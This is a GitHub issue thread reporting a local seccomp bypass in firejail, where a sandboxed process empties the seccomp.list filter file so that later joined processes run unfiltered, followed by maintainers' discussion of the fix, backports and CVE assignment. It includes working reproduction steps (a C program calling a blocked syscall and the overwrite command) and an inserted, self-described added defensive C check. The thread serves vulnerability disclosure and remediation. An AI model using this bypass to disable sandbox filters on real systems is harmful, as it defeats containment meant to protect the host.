seccomp bypass when joining existing jail #2718

Closed
apmorton opened this issue May 21, 2019 · 27 comments
Labels
bug Something isn't working security Security issue

Comments

@apmorton
Contributor

seccomp filters are copied into /run/firejail/mnt, and are writable within the jail.

A malicious process can modify files from inside the jail.
Processes that are later joined to the jail will not have seccomp filters applied.

repro steps

compile program to call blacklisted syscall

gcc -xc - <<EOF
#include <stdio.h>
#include <sys/klog.h>

int main(void) {
    printf("calling syslog syscall\n");
    klogctl(1, NULL, 0);
    printf("not killed\n");
}
EOF

create interactive jail session

$ firejail --quiet --name=jail

try to run program inside jail, noting syscall is blocked

$ ./a.out
calling syslog syscall
Bad system call (core dumped)

open new terminal and run program by joining jail, noting syscall is blocked

$ firejail --quiet --join=jail ./a.out
calling syslog syscall

back in original interactive jail session, empty the seccomp.list file and attempt to run program, noting syscall is blocked

$ echo -n "" > /run/firejail/mnt/seccomp.list
$ ./a.out
calling syslog syscall
Bad system call (core dumped)

open new terminal and run program by joining jail, noting syscall is NOT blocked

$ firejail --quiet --join=jail ./a.out
calling syslog syscall
not killed
@chiraag-nataraj
Collaborator

chiraag-nataraj commented May 21, 2019

echo -n "" > /run/firejail/mnt/seccomp.list

This fails for me with bash: /run/firejail/mnt/seccomp.list: Permission denied. Let me play around a bit, since idk if it's only a "my system" thing.

Which version of firejail are you running? Which distro?

@chiraag-nataraj
Collaborator

Okay, so I can replicate with current release, but not with current git master. Is that the same for you @apmorton?

@apmorton
Contributor Author

Confirmed, this is fixed on latest master.

seccomp files are put in /run/firejail/mnt/seccomp, which is mounted as a read-only filesystem; this mitigates the issue.
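
The following self-check is an added example written for this page; it is not firejail code and was not posted by anyone in this thread. It lets a process that has been joined to a sandbox confirm, from the defender's side, the two facts the fix relies on: that the kernel is actually enforcing a seccomp filter on the process (the `Seccomp:` field of `/proc/self/status`, a standard Linux interface), and that the directory holding the sandbox's seccomp files sits on a read-only mount. The directory path `/run/firejail/mnt/seccomp` is taken from the comment above; the function names are my own.

```c
/* Added example, not part of firejail: a defender-side self-check for a
 * process inside (or joined to) a sandbox.  It reports the seccomp mode the
 * kernel has applied to this process and whether the sandbox's seccomp file
 * directory is on a read-only mount, which is the mitigation from the fix. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/statvfs.h>

/* Parse the "Seccomp:" line from the text of /proc/self/status.
 * Returns 0 (disabled), 1 (strict), 2 (filter), or -1 if the line is absent.
 * The 8-character prefix match deliberately does not match "Seccomp_filters:". */
int parse_seccomp_mode(const char *status_text)
{
    const char *line = status_text;
    while (line && *line) {
        if (strncmp(line, "Seccomp:", 8) == 0) {
            const char *p = line + 8;
            while (*p == ' ' || *p == '\t')
                p++;
            return atoi(p);
        }
        line = strchr(line, '\n');
        if (line)
            line++;
    }
    return -1;
}

/* Read /proc/self/status and return this process's seccomp mode
 * (-1 if the file cannot be read or carries no Seccomp line). */
int current_seccomp_mode(void)
{
    char buf[8192];
    FILE *f = fopen("/proc/self/status", "r");
    if (!f)
        return -1;
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';
    return parse_seccomp_mode(buf);
}

/* 1 if path is on a read-only mount, 0 if the mount is writable,
 * -1 if the path cannot be statted (e.g. not inside a firejail sandbox). */
int is_readonly_mount(const char *path)
{
    struct statvfs st;
    if (statvfs(path, &st) != 0)
        return -1;
    return (st.f_flag & ST_RDONLY) ? 1 : 0;
}

int main(void)
{
    /* Path taken from this thread; hypothetical outside a firejail sandbox. */
    const char *seccomp_dir = "/run/firejail/mnt/seccomp";
    int mode = current_seccomp_mode();
    int ro = is_readonly_mount(seccomp_dir);

    printf("seccomp mode: %d (%s)\n", mode,
           mode == 2 ? "filter enforced" :
           mode == 1 ? "strict" :
           mode == 0 ? "NOT enforced" : "unknown");
    if (ro < 0)
        printf("%s: not present (not inside a firejail sandbox?)\n", seccomp_dir);
    else
        printf("%s: %s\n", seccomp_dir, ro ? "read-only mount" : "WRITABLE mount");

    /* Exit 0 only when both conditions hold, so the check can be scripted. */
    return (mode == 2 && ro == 1) ? 0 : 1;
}
```

Run it once in the original session and once via `firejail --join`: on an unfixed release the joined process prints mode 0 after the list file has been emptied, and the directory check reports a writable mount; on a fixed build both runs print mode 2 and a read-only mount.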

@chiraag-nataraj
Collaborator

In the future, if you think you have found a security vulnerability (which this certainly would qualify as), you should probably follow the directions in the readme (i.e. email netblue30).

@chiraag-nataraj
Collaborator

@netblue30, this is fixed in git master, but apparently is an issue in the current release. How should we proceed?

@apmorton
Contributor Author

apmorton commented May 21, 2019

neither readme (README or README.md) has security disclosure procedures

edit: just noticed in CONTRIBUTING.md, apologies

@chiraag-nataraj
Collaborator

I'll add it to the README as well, since people might not think to look at CONTRIBUTING.

@chiraag-nataraj
Collaborator

@apmorton, if you're comfortable, can you bisect the commits to figure out which one solved this? We should probably back-port just that fix...

@smitsohu
Collaborator

It is commit eecf35c

@chiraag-nataraj
Collaborator

Thanks @smitsohu! Should we back-port to LTS and current release?

@smitsohu
Collaborator

@chiraag-nataraj We already have a new release candidate, and 0.9.58 will be replaced very soon anyways.

LTS is a different story, imho it should be backported. What does @startx2017 think?

@SkewedZeppelin
Collaborator

SkewedZeppelin commented May 22, 2019

What about getting a CVE assigned?
And many distros still aren't even shipping 0.9.58.

@smitsohu
Collaborator

What about getting a CVE assigned?
And many distros still aren't even shipping 0.9.58.

@netblue30 ?

@SkewedZeppelin
Collaborator

SkewedZeppelin commented May 22, 2019

this fine?

Subject: local seccomp bypass in firejail before 0.9.60-rc1

Austin Morton has discovered a local method to bypass/disable seccomp
filters of a firejail sandbox.

Versions of firejail before 0.9.60-rc1 or eecf35c2 do not mark seccomp
files read-only, which allows overwriting them; once overwritten, any
processes joined to the existing sandbox will not have seccomp enforced.
This can allow for a denial of service or elevation of privileges.

Reported here:
https://github.com/netblue30/firejail/issues/2718

Fixed in this commit:
https://github.com/netblue30/firejail/commit/eecf35c2

Compile tested backports for LTS, 0.9.52, 0.9.54, 0.9.56, and 0.9.58.2 are
available here:
https://github.com/netblue30/firejail/issues/2718#issuecomment-495010478

@smitsohu
Collaborator

Pending backport to LTS and other versions.

More a side note: So far we as upstream only support the last version and LTS, and I tend to believe this is a wise decision. I'd say for earlier versions it is the maintainers' job to backport fixes, in line with their respective distribution policy.

@SkewedZeppelin
Collaborator

SkewedZeppelin commented May 22, 2019

@smitsohu
okay updated, would you like to send it to the oss-security list?

@SkewedZeppelin
Collaborator

SkewedZeppelin commented May 22, 2019

I have done some backports here
https://gist.github.com/SkewedZeppelin/7f67a131a3d31bfa9d64eaf1a72b1971

edit: attached as a zip for archival purposes
eecf35c-backports.zip

@smitsohu
Collaborator

smitsohu commented May 23, 2019

asked MITRE for a CVE number

@netblue30 netblue30 added the bug Something isn't working label May 26, 2019
@netblue30
Owner

Thanks @apmorton

New release Monday morning. If you want to bring in any other fix, now is the time. If we don't get a CVE number by Monday, we'll add it later. I'll grab the patch from @SkewedZeppelin and add it in the etc-fixes directory here on mainline. For LTS, a new release probably sometime next week; there are some more fixes to be added there, I'll have to talk to @startx2017 .

@rusty-snake
Collaborator

The RELNOTES should be updated, we have some new stuff like private-cwd or deterministic-exit-code and so on.

@netblue30
Owner

RELNOTES done, anything missing just add it in. I'm doing some testing right now, tonight or tomorrow morning it should be out.

@reinerh
Collaborator

reinerh commented May 30, 2019

@smitsohu Was there already a reply regarding CVE number?

Edit: Did you use this form? https://cveform.mitre.org/

@smitsohu
Collaborator

@reinerh We have no number assigned yet.

Yes, I used the webform. I think I'm going to ask if there is something we can do on our end to speed up the process.

@netblue30
Owner

@startx2017 started porting, we will have a LTS release by the end of the week with or without CVE.

@reinerh
Collaborator

reinerh commented May 30, 2019

(FYI a backported fix is in Debian unstable since yesterday, together with a fix for #2401; and it has been unblocked for migration to Buster.)

@reinerh reinerh added the security Security issue label May 31, 2019
@carnil

carnil commented Jun 3, 2019

CVE-2019-12589 was assigned for this issue.

@netblue30
Owner

LTS version also released, CVE status page updated - https://firejail.wordpress.com/download-2/cve-status/
